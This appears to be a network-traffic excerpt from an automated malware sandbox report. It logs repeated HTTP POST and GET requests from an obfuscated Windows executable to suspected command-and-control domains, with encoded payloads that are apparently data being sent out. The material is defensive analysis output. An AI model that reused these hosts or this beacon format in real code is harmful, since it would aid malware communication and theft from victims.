                                                                              14192.168.2.549484134.122.133.80802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:49.653376102 CET700OUTPOST /3541/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.x3kwqc5tye4vl90y.top
                                                                              Origin: http://www.x3kwqc5tye4vl90y.top
                                                                              Referer: http://www.x3kwqc5tye4vl90y.top/3541/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 73 57 6f 7a 2f 5a 42 52 36 63 6b 2f 6e 4b 4e 74 53 6d 77 33 43 4d 62 6e 67 66 73 72 72 54 51 46 46 64 35 6f 67 6c 74 6f 67 74 54 43 49 4d 47 53 74 67 33 77 4f 2b 71 4a 58 2f 67 45 63 47 54 6b 6d 49 72 32 47 4f 56 68 38 30 4e 69 6c 46 59 61 34 54 59 32 2b 6b 65 71 49 58 50 68 2f 6c 57 48 6a 55 54 45 72 4e 2f 43 74 64 70 6f 6e 72 53 6e 73 4d 47 34 61 49 76 66 52 51 30 6f 41 62 36 77 39 47 39 71 72 45 34 44 70 61 43 32 57 4a 42 74 6c 6d 74 7a 33 39 4a 76 53 61 66 71 32 32 71 37 70 7a 51 5a 33 57 4b 6c 6c 59 6c 71 73 4c 79 48 68 45 38 55 6a 35 58 6f 5a 35 31 44 35 47 57 4e 6e 54 57 2f 35 4f 37 63 48 31 39 62 75 52 2b 52 2b 6f 67 72 36 37 69 61 33 5a 35 6c
                                                                              Data Ascii: t0A=sWoz/ZBR6ck/nKNtSmw3CMbngfsrrTQFFd5ogltogtTCIMGStg3wO+qJX/gEcGTkmIr2GOVh80NilFYa4TY2+keqIXPh/lWHjUTErN/CtdponrSnsMG4aIvfRQ0oAb6w9G9qrE4DpaC2WJBtlmtz39JvSafq22q7pzQZ3WKllYlqsLyHhE8Uj5XoZ51D5GWNnTW/5O7cH19buR+R+ogr67ia3Z5l
                                                                              Jan 14, 2025 12:02:50.518213987 CET289INHTTP/1.1 404 Not Found
                                                                              Content-Length: 146
                                                                              Content-Type: text/html
                                                                              Date: Tue, 14 Jan 2025 11:02:50 GMT
                                                                              Server: nginx
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.549485134.122.133.80802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:52.192111015 CET1717OUTPOST /3541/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 1240
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.x3kwqc5tye4vl90y.top
                                                                              Origin: http://www.x3kwqc5tye4vl90y.top
                                                                              Referer: http://www.x3kwqc5tye4vl90y.top/3541/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 73 57 6f 7a 2f 5a 42 52 36 63 6b 2f 6e 4b 4e 74 53 6d 77 33 43 4d 62 6e 67 66 73 72 72 54 51 46 46 64 35 6f 67 6c 74 6f 67 74 4c 43 4c 2b 2b 53 73 47 2f 77 50 2b 71 4a 5a 66 67 46 63 47 54 31 6d 49 54 79 47 4a 64 62 38 33 31 69 6b 6e 51 61 2b 69 59 32 72 55 65 71 41 33 50 67 37 6c 58 64 6a 55 44 2b 72 4a 6a 43 74 64 70 6f 6e 6f 61 6e 38 4e 47 34 59 49 76 65 51 51 30 6b 45 62 37 56 39 47 6c 51 72 45 38 31 31 37 69 32 57 74 74 74 6a 54 78 7a 37 39 4a 78 54 61 65 31 32 32 6e 38 70 7a 64 6d 33 57 2b 4c 6c 61 31 71 6f 65 66 74 30 46 4d 64 34 36 72 73 53 59 6c 74 70 32 4b 67 67 53 6d 5a 77 35 50 4b 4e 6c 31 78 6f 47 75 42 31 36 42 4f 70 2f 57 53 2b 2f 46 6f 54 72 2b 44 6b 56 55 49 6a 59 76 5a 35 64 64 58 6e 57 66 4c 6d 52 72 39 4d 67 42 4f 51 4a 49 38 51 4e 76 6d 56 4f 36 6f 76 44 4c 6f 6b 4e 2f 39 6a 56 53 64 47 64 77 74 75 42 45 42 50 34 2f 63 35 35 76 74 71 53 75 46 75 56 33 66 44 31 73 58 64 47 4e 57 4a 38 41 4b 65 51 73 38 61 61 6b 49 37 6c 38 52 33 76 75 63 6a 38 6a 54 69 6a 33 6c 62 63 [TRUNCATED]
                                                                              Data Ascii: t0A=sWoz/ZBR6ck/nKNtSmw3CMbngfsrrTQFFd5ogltogtLCL++SsG/wP+qJZfgFcGT1mITyGJdb831iknQa+iY2rUeqA3Pg7lXdjUD+rJjCtdponoan8NG4YIveQQ0kEb7V9GlQrE8117i2WtttjTxz79JxTae122n8pzdm3W+Lla1qoeft0FMd46rsSYltp2KggSmZw5PKNl1xoGuB16BOp/WS+/FoTr+DkVUIjYvZ5ddXnWfLmRr9MgBOQJI8QNvmVO6ovDLokN/9jVSdGdwtuBEBP4/c55vtqSuFuV3fD1sXdGNWJ8AKeQs8aakI7l8R3vucj8jTij3lbcCMWta6zhc4qGZzuPf5PrTld3qE7fpsid874czHvfjprPKiyj37Q+3KpmFG3oZJCoyaYPeQsckVYKz23Qc5r3lazxlBCAHQMRV8nmaLwdhl5blnOqi2nmW5BV64KYSlIpehyskP9ySdUGzyeiaSrpe6qrKqYi7q8vZ6pOFbpZRBk6t2nKbD3+KHN+lnseKDOoB9HhQDq5/FZ85IYH6FCRYd+ZKsZSvS52gEfJSXVDOwl52+Y7waM9vM6nhBn/0tbdPaF1PGNQUgd3mS+awNPc6uEgdepuU26yao4v++MrLXu+AM+xr5MhVIH+CyKR/wYHZltt+lEJGO//pceAWoGRFnw14oU4aoUUFkFaFLJPS+adDs40pNJ+Vt5/Lu+IcQEdZJiJH6k9IHiQBo+x/iVduIg1xgtzSpU7uwrjec0YJ1kr5RfWjUBqdh9Pp/z7Zyd3lE6mDQ9eM7SOdDfK5dOZaG9T+77oTMHdSJW+BD4E1JV0S1VMWj1ppYCBwCaJUgaRqTjtPPBeqML+ujP9xCXYoiO+nQgbGi7wHKyduQN725l6cPNaM3yNVK2hItvpi+DEmExeLi7JjyBCW9k/VzHylepyc0yDmriDlyKmwYTrtiezO9u1B2PwYlPahvP96kSZoq+B6ZeyKKGy5eAdbU4q+bXIKlRiuZ+NdH [TRUNCATED]
                                                                              Jan 14, 2025 12:02:53.252290964 CET289INHTTP/1.1 404 Not Found
                                                                              Content-Length: 146
                                                                              Content-Type: text/html
                                                                              Date: Tue, 14 Jan 2025 11:02:52 GMT
                                                                              Server: nginx
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.549486134.122.133.80802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:02:54.734879971 CET402OUTGET /3541/?t0A=hUAT8pha3r4H+t9+S3MxJs6WhIsd+DYEOZth0k9fm5KLJvCulAvDEPbOc8wYZ2nfufyvJ6Jk1FtS1iVn+RgDiEmRDBrl1krw2W73iPr4/Jg/5IC96P6rf6fefVYTNIm+pw==&Gxq=1VbhX6 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.x3kwqc5tye4vl90y.top
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:02:55.619914055 CET289INHTTP/1.1 404 Not Found
                                                                              Content-Length: 146
                                                                              Content-Type: text/html
                                                                              Date: Tue, 14 Jan 2025 11:02:55 GMT
                                                                              Server: nginx
                                                                              Connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.54948747.83.1.90802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:08.838386059 CET653OUTPOST /bqha/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.qzsazi.info
                                                                              Origin: http://www.qzsazi.info
                                                                              Referer: http://www.qzsazi.info/bqha/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 61 59 34 79 39 4a 5a 70 6e 2b 6d 61 4e 79 71 4d 30 70 2b 73 73 51 74 6b 65 62 6a 72 42 56 6f 77 53 4e 4f 43 6c 74 6f 31 62 43 64 33 63 37 42 61 76 76 61 46 50 6c 32 65 44 75 4e 79 77 7a 55 34 75 72 68 47 56 33 35 6f 48 77 43 66 59 57 4a 51 76 7a 6e 50 30 49 77 77 4e 56 46 4d 79 51 51 78 75 33 56 56 53 68 33 4a 50 46 6c 4b 41 64 2b 6d 79 6e 4d 5a 4d 31 63 77 57 58 55 30 4c 71 59 64 56 2f 56 74 51 30 49 59 41 68 62 41 69 42 38 58 4e 4f 43 52 71 5a 70 4d 79 4a 65 34 43 52 49 58 2b 6e 56 56 4e 76 61 6c 39 43 55 59 6a 48 57 53 74 76 70 42 43 39 61 4b 2f 4c 65 38 6a 63 77 67 46 61 69 4f 59 49 77 3d
                                                                              Data Ascii: t0A=aY4y9JZpn+maNyqM0p+ssQtkebjrBVowSNOClto1bCd3c7BavvaFPl2eDuNywzU4urhGV35oHwCfYWJQvznP0IwwNVFMyQQxu3VVSh3JPFlKAd+mynMZM1cwWXU0LqYdV/VtQ0IYAhbAiB8XNOCRqZpMyJe4CRIX+nVVNval9CUYjHWStvpBC9aK/Le8jcwgFaiOYIw=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.54948847.83.1.90802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:11.380228043 CET673OUTPOST /bqha/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.qzsazi.info
                                                                              Origin: http://www.qzsazi.info
                                                                              Referer: http://www.qzsazi.info/bqha/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 61 59 34 79 39 4a 5a 70 6e 2b 6d 61 43 78 69 4d 6e 59 2b 73 72 77 74 6e 51 37 6a 72 54 56 6f 30 53 4e 79 43 6c 73 38 66 61 77 35 33 64 65 6c 61 75 74 79 46 43 46 32 65 62 65 4e 33 2b 54 55 33 75 73 70 4f 56 79 42 6f 48 77 2b 66 59 55 42 51 76 43 6e 4d 79 59 77 79 59 46 46 4f 71 77 51 78 75 33 56 56 53 68 6a 6e 50 46 4e 4b 41 74 4f 6d 7a 43 34 59 58 56 63 7a 52 58 55 30 50 71 59 5a 56 2f 55 43 51 31 6c 39 41 69 6a 41 69 45 51 58 4e 66 43 53 6a 5a 6f 6d 39 70 66 6e 54 44 5a 69 34 30 74 5a 4d 75 72 39 72 51 59 31 69 78 6e 34 33 4e 68 70 52 64 32 79 76 59 57 4c 79 73 52 4a 66 35 79 2b 47 66 6d 56 4d 47 2f 36 2f 6e 46 39 42 76 37 66 59 67 38 54 42 69 4d 67
                                                                              Data Ascii: t0A=aY4y9JZpn+maCxiMnY+srwtnQ7jrTVo0SNyCls8faw53delautyFCF2ebeN3+TU3uspOVyBoHw+fYUBQvCnMyYwyYFFOqwQxu3VVShjnPFNKAtOmzC4YXVczRXU0PqYZV/UCQ1l9AijAiEQXNfCSjZom9pfnTDZi40tZMur9rQY1ixn43NhpRd2yvYWLysRJf5y+GfmVMG/6/nF9Bv7fYg8TBiMg
                                                                              Jan 14, 2025 12:03:12.829078913 CET137INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0
                                                                              Date: Tue, 14 Jan 2025 11:03:12 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.54948947.83.1.90802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:13.929827929 CET1690OUTPOST /bqha/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 1240
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.qzsazi.info
                                                                              Origin: http://www.qzsazi.info
                                                                              Referer: http://www.qzsazi.info/bqha/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 61 59 34 79 39 4a 5a 70 6e 2b 6d 61 43 78 69 4d 6e 59 2b 73 72 77 74 6e 51 37 6a 72 54 56 6f 30 53 4e 79 43 6c 73 38 66 61 77 78 33 64 73 74 61 76 4b 47 46 44 46 32 65 46 75 4e 32 2b 54 55 51 75 74 4e 43 56 79 45 58 48 31 79 66 5a 33 5a 51 70 32 54 4d 37 59 77 79 48 31 46 50 79 51 51 6f 75 7a 78 76 53 68 7a 6e 50 46 4e 4b 41 76 47 6d 6c 6e 4d 59 56 56 63 77 57 58 55 34 4c 71 59 78 56 2f 38 34 51 31 52 44 41 53 44 41 68 6c 38 58 50 74 61 53 73 5a 70 41 30 35 66 76 54 44 56 4c 34 30 68 2f 4d 75 76 58 72 54 34 31 76 6e 6d 77 75 5a 68 4e 44 4d 47 66 73 71 32 39 76 5a 41 70 43 35 2b 59 42 2b 61 4a 50 6e 57 55 34 43 41 39 45 50 2b 58 4d 45 38 30 54 47 39 32 72 65 63 35 7a 4e 78 54 38 5a 37 4b 71 30 70 66 67 47 4e 54 70 76 62 39 4e 7a 34 32 30 46 70 5a 79 69 73 46 62 62 35 50 69 59 53 66 44 6f 34 63 4d 37 48 50 53 33 49 54 7a 64 76 6e 6c 74 51 51 2f 48 31 34 6f 49 63 44 41 31 69 7a 46 50 6b 44 47 46 77 37 2f 74 6a 58 45 45 43 37 56 33 42 6c 37 50 77 4b 6d 51 4f 58 51 64 6b 63 42 61 2f 2b 39 30 [TRUNCATED]
                                                                              Data Ascii: t0A=aY4y9JZpn+maCxiMnY+srwtnQ7jrTVo0SNyCls8fawx3dstavKGFDF2eFuN2+TUQutNCVyEXH1yfZ3ZQp2TM7YwyH1FPyQQouzxvShznPFNKAvGmlnMYVVcwWXU4LqYxV/84Q1RDASDAhl8XPtaSsZpA05fvTDVL40h/MuvXrT41vnmwuZhNDMGfsq29vZApC5+YB+aJPnWU4CA9EP+XME80TG92rec5zNxT8Z7Kq0pfgGNTpvb9Nz420FpZyisFbb5PiYSfDo4cM7HPS3ITzdvnltQQ/H14oIcDA1izFPkDGFw7/tjXEEC7V3Bl7PwKmQOXQdkcBa/+90kIN9lUkYIedXQ+Q4PFb1B5RZc5spceOWhY0F9lUMrK6VDLkLaBQm5uGV5DCZ2Grch/MtD763QxuqwT/or16AuU6phznS4pkaQSJc1v+8cmrD7kPrWJO86SUoaUv53cUDtOD9ovuHvpbRra1pTcftarQy+jri9WZTBAyquMcGxieGqEF55OSrY++LuxPzN6tBj4R5KesUehhDFTNOVJdiPzmiJ6sLuYIzjSCpMleEgeHA4TFtP42o98FuKC14G9p37KEHC4fOxQZugziIZ9F723yLfkJq+I/2P3awdGhUkYjt6RlcBVcM7BGRlsRizWRQapqDaE3q4lrYrDsY0o4jPCF/WnHbLG/3K9/P8L1AqQXt7kYJz4pFytN/tU2yQ3dLiNf6D3YmeR8AoPG5TT0OKVemWQIz0o+nHw9mn6Ufl6tWjcb2YFbapE7+XCOASLJNlYNRVFlr6tL7yPWRR8oFGAzUja5LwvX3rp7mk5nYKy8ZfOjwMY+AlAof4JS/t98+5BPvOwDZLFQRWtWMNz/GXcQr+9wbMZx8oXcsTSDnwznBYFmKiq4Eb6JRleLcwiLreOZ/5+GcvtfoI1gMX1bjSkbUiS5gxDUFjfAC7SwaXhrFmse+9nKlYehncVXqfl0SGeUgDst/RO/MClznOOAC30uDeAKHzHpakU [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.54949047.83.1.90802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:16.473526001 CET393OUTGET /bqha/?t0A=XaQS++1s5Z2sQk6jmp6aqlAdT5jjUiNTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE4a8JCTBXzC8s0SdcTgnAYDNlXd2JyzVPT3Fze3sMGaFiAg==&Gxq=1VbhX6 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.qzsazi.info
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:03:18.078668118 CET139INHTTP/1.1 567 unknown
                                                                              Server: nginx/1.18.0
                                                                              Date: Tue, 14 Jan 2025 11:03:17 GMT
                                                                              Content-Length: 17
                                                                              Connection: close
                                                                              Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                              Data Ascii: Request too large


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.54949184.32.84.32802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:23.170435905 CET665OUTPOST /m320/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.truckgoway.info
                                                                              Origin: http://www.truckgoway.info
                                                                              Referer: http://www.truckgoway.info/m320/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 43 6a 63 70 7a 6a 52 4c 39 6c 32 5a 47 2b 47 55 6d 58 49 4e 4a 43 6f 33 72 42 54 73 79 38 77 47 79 4e 44 73 6a 46 46 36 70 61 59 79 63 73 67 4d 58 4c 37 61 51 67 64 45 2b 6a 37 47 6c 7a 4e 39 79 6d 44 32 4a 45 70 62 38 77 4c 52 4b 43 64 5a 4f 35 50 51 35 53 61 6c 33 39 59 74 53 76 46 74 46 36 54 48 72 7a 75 2b 70 65 64 6f 74 31 32 37 68 4f 73 30 77 79 47 59 6e 34 6a 6f 42 56 62 35 5a 44 38 68 30 71 4e 68 31 79 52 77 6d 57 38 79 35 33 6d 4f 32 53 43 49 32 61 39 6a 45 41 65 79 6d 5a 69 79 76 64 64 32 56 63 31 30 79 32 57 30 4c 61 4f 67 39 43 72 35 41 31 66 6f 59 50 6d 71 6a 4a 76 2f 4e 51 49 3d
                                                                              Data Ascii: t0A=CjcpzjRL9l2ZG+GUmXINJCo3rBTsy8wGyNDsjFF6paYycsgMXL7aQgdE+j7GlzN9ymD2JEpb8wLRKCdZO5PQ5Sal39YtSvFtF6THrzu+pedot127hOs0wyGYn4joBVb5ZD8h0qNh1yRwmW8y53mO2SCI2a9jEAeymZiyvdd2Vc10y2W0LaOg9Cr5A1foYPmqjJv/NQI=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.54949284.32.84.32802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:25.709511042 CET685OUTPOST /m320/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.truckgoway.info
                                                                              Origin: http://www.truckgoway.info
                                                                              Referer: http://www.truckgoway.info/m320/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 43 6a 63 70 7a 6a 52 4c 39 6c 32 5a 55 75 57 55 31 6b 51 4e 4f 69 6f 30 75 42 54 73 35 63 77 4b 79 4e 50 73 6a 41 68 71 70 49 4d 79 46 4e 51 4d 46 66 76 61 54 67 64 45 32 44 36 74 68 7a 4e 30 79 68 4c 2b 4a 46 6c 62 38 7a 33 52 4b 44 74 5a 4f 4f 62 54 6a 69 61 6e 2f 64 59 34 64 50 46 74 46 36 54 48 72 7a 36 55 70 66 35 6f 74 46 47 37 67 71 59 33 35 53 47 62 33 6f 6a 6f 46 56 61 79 5a 44 38 58 30 72 51 70 31 30 4e 77 6d 56 6f 79 35 6c 65 52 68 43 43 4f 79 61 38 71 45 53 43 36 70 49 58 35 74 4f 77 6a 4d 50 74 73 36 67 6e 65 52 34 47 49 75 69 48 42 51 6d 58 66 4a 2f 48 44 35 71 2f 50 54 48 66 6f 74 49 56 4e 39 7a 52 34 49 54 39 46 79 46 77 6c 5a 2f 67 7a
                                                                              Data Ascii: t0A=CjcpzjRL9l2ZUuWU1kQNOio0uBTs5cwKyNPsjAhqpIMyFNQMFfvaTgdE2D6thzN0yhL+JFlb8z3RKDtZOObTjian/dY4dPFtF6THrz6Upf5otFG7gqY35SGb3ojoFVayZD8X0rQp10NwmVoy5leRhCCOya8qESC6pIX5tOwjMPts6gneR4GIuiHBQmXfJ/HD5q/PTHfotIVN9zR4IT9FyFwlZ/gz


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.54949384.32.84.32802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:03:28.254761934 CET1702OUTPOST /m320/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 1240
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.truckgoway.info
                                                                              Origin: http://www.truckgoway.info
                                                                              Referer: http://www.truckgoway.info/m320/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Raw: 74 30 41 3d 43 6a 63 70 7a 6a 52 4c 39 6c 32 5a 55 75 57 55 31 6b 51 4e 4f 69 6f 30 75 42 54 73 35 63 77 4b 79 4e 50 73 6a 41 68 71 70 49 30 79 5a 72 45 4d 58 6f 54 61 63 41 64 45 34 6a 37 4b 68 7a 4d 32 79 67 76 79 4a 46 34 75 38 31 7a 52 49 68 31 5a 65 37 33 54 74 53 61 6e 39 64 59 73 53 76 46 30 46 36 69 4f 72 7a 71 55 70 66 35 6f 74 47 4f 37 6b 2b 73 33 2f 53 47 59 6e 34 69 70 42 56 61 61 5a 44 30 48 30 6f 39 4c 31 43 39 77 6e 7a 49 79 34 51 79 52 69 69 43 4d 38 36 38 79 45 53 50 6b 70 49 36 47 74 4f 31 72 4d 50 56 73 35 46 47 38 4a 72 47 65 34 78 7a 67 41 6d 66 6d 65 59 57 69 30 4b 33 4d 51 45 37 72 70 71 34 6a 79 57 4e 71 4c 43 30 2b 6a 79 41 52 5a 4a 56 39 72 31 71 73 4b 2f 33 75 38 6e 4f 6a 69 4c 78 4a 64 4b 56 74 79 43 4d 64 7a 46 68 59 45 38 44 62 36 6f 4a 50 37 37 33 55 6b 57 4a 58 74 63 6f 44 54 32 66 57 65 76 6c 72 64 65 32 53 38 62 61 2b 4e 54 5a 73 38 45 47 76 54 6e 44 6a 54 4b 31 46 31 61 77 70 55 35 4a 4f 42 4a 42 6c 79 39 47 66 49 4e 58 35 78 74 73 63 64 49 7a 51 55 70 71 71 42 35 [TRUNCATED]
